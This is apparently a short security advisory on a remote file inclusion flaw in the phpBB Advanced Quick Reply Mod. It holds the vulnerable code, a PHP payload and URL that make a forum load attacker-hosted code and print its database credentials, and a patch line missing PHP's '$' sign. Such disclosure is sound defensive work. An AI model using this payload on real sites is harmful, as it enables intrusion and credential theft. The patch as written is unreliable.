|
|
| |
| Hai Nam Luke has found a security hole in the phpBB Advanced Quick Reply Mod (Code Injection). Attackers can exploit this Mod to inject PHP code into an existing forum, effectively compromising the site's integrity. |
| |
Credit:
The information has been provided by Hai Nam Luke.
|
| |
Exploit:
In the file quick_reply.php you will notice the following vulnerable code:
if ( $mode == 'smilies' )
{
define('IN_PHPBB', true);
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
generate_smilies('window', PAGE_POSTING);
exit;
}
If you create a file called 'extension.inc' and include in it for example:
<?php
include('config'.'.php');
echo "DB Type: $dbms <br>";
echo "DB Host: $dbhost <br>";
echo "DB Name: $dbname <br>";
echo "DB User: $dbuser <br>";
echo "DB Pass: $dbpasswd <br>";
exit;
?>
Accessing the file by issuing the following URL: http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smiles
Will return the server's database username and password.
Patch:
Modify in quick_reply.php the following:
[FIND]
if ( $mode == 'smilies' )
{
[ADD BEFORE]
phpbb_root_path = "./";
|
|
|
